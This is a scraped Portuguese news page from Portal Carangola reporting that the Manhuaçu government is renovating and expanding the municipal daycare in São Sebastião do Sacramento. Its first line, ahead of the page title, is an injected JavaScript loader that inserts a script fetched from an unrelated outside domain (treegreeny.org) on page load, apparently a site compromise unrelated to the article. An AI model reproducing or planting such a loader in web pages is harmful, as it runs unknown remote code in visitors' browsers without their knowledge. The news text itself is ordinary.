;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Escola do Distrito de Sacramento passa por reforma. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Escola do Distrito de Sacramento passa por reforma.

O Governo de Manhuaçu, por meio das Secretarias de Obras e Educação, está reformando e ampliando a Creche Municipal de São Sebastião do Sacramento. O educandário está sendo adaptado para receber também as crianças da creche do distrito.

 A Creche 13 de Maio recebeu a primeira reforma no ano passado, quando o prefeito Nailton Heringer visitou o local ao lado do secretário de Obras, João Amâncio de Faria. Na oportunidade foi detectado que o prédio tinha sérios problemas de mofo e necessitava de uma intervenção rápida. Assim foi feito, incluindo a construção da cobertura para evitar os vazamentos. O trabalho que está sendo realizado neste momento é de ampliação de alguns espaços para receber novos alunos. Servidores estão trabalhando desde o início do mês e já fizeram melhorias importantes. A começar pela construção de escadas, piso e até renovação do sistema elétrico. Na parte superior do prédio, o material já está pronto para ser utilizado na construção de novas salas. A estrutura da caixa d’água, com maior capacidade de armazenamento, também vai ser feito no local.

O Governo de Manhuaçu tem tido atuação reconhecida na área de educação. Várias escolas e creches do município passaram ou passam por reforma. Além disso, a maioria já recebeu nova mobilha para as salas de aula e secretarias.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.